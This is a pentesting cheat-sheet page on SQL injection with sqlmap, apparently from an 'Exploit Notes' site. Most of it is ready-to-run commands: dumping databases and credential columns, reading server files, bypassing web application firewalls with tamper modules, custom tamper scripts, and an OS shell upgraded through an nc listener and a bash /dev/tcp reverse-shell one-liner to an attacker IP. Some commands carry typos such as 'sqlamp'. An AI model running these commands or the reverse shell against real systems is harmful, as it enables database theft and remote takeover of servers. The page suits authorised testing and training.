Exploit Notes
Exploit Notes

Exploits related to Web

Method

HTTP Rate Limit Bypass
Virtual Hosts (VHOSTS) Enumeration
WAF (Web Application Firewall) Detection
Web Basic Pentesting
Web Content Discovery
Web Login Bypass

Security Risk

Blind XXE
Broken Access Control
Business Logic Attack
CORS (Cross-Origin Resource Sharing) Attack
CRLF (Carriage Return Line Feed) Injection
CSRF (Cross-Site Request Forgery)
Cookie Hijacking
Directory (Path) Traversal
File Inclusion
File Upload Attack
HTTP Request Smuggling
IDOR (Insecure Direct Object References) Attack
Insecure Deserialization
JSON.NET Deserialization
NoSQL Injection
Node.js Deserialization Attack
OAuth Attack
OS Command Injection
Open Redirect
PHP Object Injection
SQL Injection Cheat Sheet
SQL Injection with Sqlmap
SSRF (Server-Side Request Forgery)
SSTI (Server-Side Template Injection)
XSS (Cross-Site Scripting)
XSS with Dynamic PDF
XST (Cross-Site Tracing)
XXE (XML External Entity)

CMS

Bolt CMS Pentesting
CMS (Content Management System) Pentesting
Cockpit CMS Pentesting
Concrete CMS Pentesting
FUEL CMS Pentesting
Joomla CMS Pentesting
Mara CMS Pentesting
Subrion CMS Pentesting
TYPO3 Pentesting
WordPress Pentesting

Framework

AJP (Apache JServ Protocol) Pentesting
Angular Pentesting
Apache Struts Pentesting
Django Pentesting
Flask Jinja2 Pentesting
Spring Cloud Function RCE
Spring Pentesting
Werkzeug Pentesting

API

API Pentesting
GraphQL Pentesting

Cloud

AWS (Amazon Web Services) Pentesting
Spring Cloud Function RCE

Tool

How to Use Burp Suite
How to Use OWASP ZAP

Others

Apache ActiveMQ Pentesting
Apache Tomcat Pentesting
Atlassian Confluence Pentesting
Browser in the Browser (BITB) Attack
ClipBucket Pentesting
Code Deobfuscation
Codiad Pentesting
Dompdf RCE
Dump Git Repository from Website
Grafana Pentesting
HashiCorp Consul Pentesting
JBOSS Pentesting
JWT (Json Web Token) Pentesting
Jenkins Pentesting
Log4j Pentesting
OpenCATS Pentesting
PHP Srand Time Abusing
Restaurant Management System (RMS) Pentesting
TeamCity Pentesting
Tiny File Manager Pentesting
Web Browser Settings for Pentesting
Web PHP Pentesting
WebAnno Pentesting
WebDAV Pentesting
WebSocket Pentesting
Webmin Pentesting

SQL Injection with Sqlmap

Last modified: 2023-02-10

Database Reverse Shell SQL Injection Web

SQL injection (SQLi) is a code injection technique used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution. This page provides how to inject SQL using sqlmap.

Basic Commands

# GET request
sqlmap -u "http://<target-ip>/?search=test"
# -p: target parameter
sqlmap -u "http://<target-ip>/?category=test&item=1" -p item 

# Header param injection
sqlmap -u "https://example.com/?search=test" --headers "X-Forwarded-For: 1*"

# POST request
sqlmap -u "http://<target-ip>" --data="username=test&password=test"

Using Request File

We can specify a request file which is generated in Burp Suite.
It can be used by adding the "-r" flag.

sqlmap -r request.txt
sqlmap -r request.txt --dump --dbs --tables --columns --random-agent
sqlmap -r request.txt --dump --dbms mysql --risk 3 --level 5

# --fresh-queries: new data in tables
sqlmap -r request.txt --fresh-queries

# --current-user: Retrieve current user
sqlmap -r request.txt --current-user
# --current-db: Retrieve current DB
sqlamp -r request.txt --current-db

# Specify dabase name, table name, column name
sqlmap -r request.txt -D database_name -T table_name -C column_name
# Specify multiple columns
sqlmap -r request.txt -D database_name -T table_name -C username,password

# --technique U: Union attack
# --delay 2: Time delay
sqlmap -r request.txt --technique U --delay 2
# --technique T: Time-based Blind SQLi
sqlmap -r request.txt --technique T

# --time-sec: Sleep time for Time-Based Blind SQLi
sqlmap -r request.txt --time-sec 2

# --ignore-code: Ignore specific response
sqlmap -r request.txt --ignore-code 401

# --dump-all: Dump all database table entries
sqlmap -r request.txt --dump-all

Web Shell

Add option "--os-shell" to interact with web shell.

sqlmap -u "http://<target-ip>" --cookie="value=*" --os-shell

After activating, you may want to upgrade to the full functional shell.
You can do that using reverse shell.

In your local machine,

nc -lvnp 4444

Then execute the following command in web shell.

os-shell> bash -c 'bash -i >& /dev/tcp/<your-local-ip>/4444 0>&1'

Read Files

# --batch: never ask for user input, use the default behavior
sqlmap -r request.txt --file-read "/var/www/html/index.php" --time-sec 10 --batch
sqlmap -r request.txt --file-read "/var/www/<subdomain>/index.php" --time-sec 10 --batch

sqlmap -u "http://<target-ip>/?q=test" --file-read "var/www/html/index.php" --time-sec 10 --batch

Tamper

The sqlmap can be tampered by custom python script e.g. tamper.py or the default library.

WAF (Web Application Firewall) Bypass

This post explains details for what each module works.

# General
sqlmap -r request.txt --tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes

# MSSQL
sqlmap -r request.txt --tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes

# MySQL
sqlamp -r request.txt --tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor

Custom tamper modules (Base64 encode)

We can also create our custom modules.
For instance, we create "tamper.py".

#!/usr/bin/python3
from lib.core.convert import encodeBase64
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.NORMAL

def dependencies():
    pass
    
def tamper(payload, **kwargs):
    payload = encodeBase64("%s" % payload, binary=False)
    return payload

Then execute sqlmap.

# The tamper is a module, so we need to create __init__.py in the current directory.
touch __init__.py
sqlmap -u "https://example.com/" --cookie "session=*" --tamper=tamper.py

Multiple Requests

#!/usr/bin/python
import requests
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.NORMAL

address = "http://vulnerable.com"
password = "test"

def dependencies():
    pass

def create_account(payload):
    with requests.Session() as s:
        data = {"username": payload, "password": password}
        resp = s.post(f"{address}/signup", data=data)

def login(payload):
    with requests.Session() as s:
        data = {"username": payload, "password": password}
        resp = s.post(f"{address}/login", data=data)
        sessid = s.cookies.get("session"None)
    return "session={}".format(sessid)


def tamper(payload, **kwargs):
    headers = kwargs.get("headers", {})
    create_account(payload)
    headers["Cookie"] = login(payload)
    return payload

Then run the sqlmap with the tamper option.

sqlmap --tamper tamper.py --url http://vulnerable.com/signup --data "username=admin&password=test" --second-url "http://vulnerable.com/post" --no-cast
Twitter GitHub

Tools by HDKS

Fuzzagotchi

Automatic web fuzzer.

aut0rec0n

Auto reconnaissance CLI.

Hash Cracker

Hash identifier.